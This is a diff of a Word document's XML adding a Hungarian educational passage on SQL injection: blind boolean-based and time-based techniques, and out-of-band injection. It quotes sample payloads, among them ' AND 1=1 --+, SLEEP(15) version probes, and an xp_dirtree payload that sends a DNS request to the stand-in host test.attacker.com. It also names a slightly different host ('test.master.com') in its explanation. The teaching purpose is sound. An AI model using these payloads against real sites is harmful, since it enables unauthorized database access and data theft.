           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>következtetéses</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>befecskendezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> esetén</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ellentétben a sávon belüli </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injektálássa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">l - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hosszabb ideig tarthat, amíg a támadók kihasználják, ugyanakkor ugyanolyan veszélyes, mint az SQL Injection bármely más formája.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezen fajta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> esetén a webalkalmazáson keresztül nem kerülnek át tényleges adatok, és a támadó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>em láthatja a sávon belüli támadás eredményé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>helyett a támadó hasznos terhelések küldésével képes rekonstruálni az adatbázis-struktúrát, figyelemmel kísérve a webalkalmazás válaszát és az adatbázis-kiszolgáló ebből fakadó viselkedését.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mint altípusa, a logikai alapú</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (boolean-based)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">injekció </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>következtetéses</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection technika, amely SQL lekérdezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> arra kényszeríti az alkalmazást, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hogy a lekérdezéstől függően más eredményt adjon vissza.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az alábbi URL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' AND </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy lekérdezést generál:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>’ AND 1=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ha az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>l.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek után, ha</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy igaz állítást </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">adunk meg: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>' AND 1=1 --+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy HAMIS) függően </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tehát </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a HTTP válasz tartalma megváltozik, vagy ugyanaz marad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ezt használja ki a vak </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Az időalapú </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(time-based) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injekció</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>esetén a támadó egy SQL-parancsot küld a kiszolgálóna</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy késleltesse a lekérdezések végrehajtását.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Erre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SLEEP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függvény adhatja: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc70610878"/>
+      <w:r>
+        <w:t>Sávon kívüli (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>out-of</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-band)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sávon kívüli injekció akkor fordul elő, amikor a támadó nem tudja ugyan azt a csatornát használni a támadás elindításához és az eredmények összegyűjtéséhez. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A legritkább használt típus a három közül, mivel a webalkalmazás által használt adatbázis-kiszolgálón engedélyezett funkcióktól függ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez a technika az adatbázis-szerver azon képességére támaszkodik, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">adatok továbbításához DNS vagy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HTTP kéréseket használ. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A típus sikeres használatakor a felhasználó DNS kérelmét </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a támadó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy olyan szerverre küldi át</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parancsával</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>irányít</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Ilyen támadásra alkalmas URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>például:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dekódoláskor a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>%5c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezzel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> támadó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>test.master.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> webhelyre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kényszeríti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a DNS kérést</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a támadás sikeres.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3311,7 +5920,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc70106700"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc70610879"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3321,12 +5930,14 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Következményei</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Megelőzési módjai</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -3344,57 +5955,394 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sikeres SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>njection támadás képes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:t xml:space="preserve">Az SQL injekciós </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sebezhetőség</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
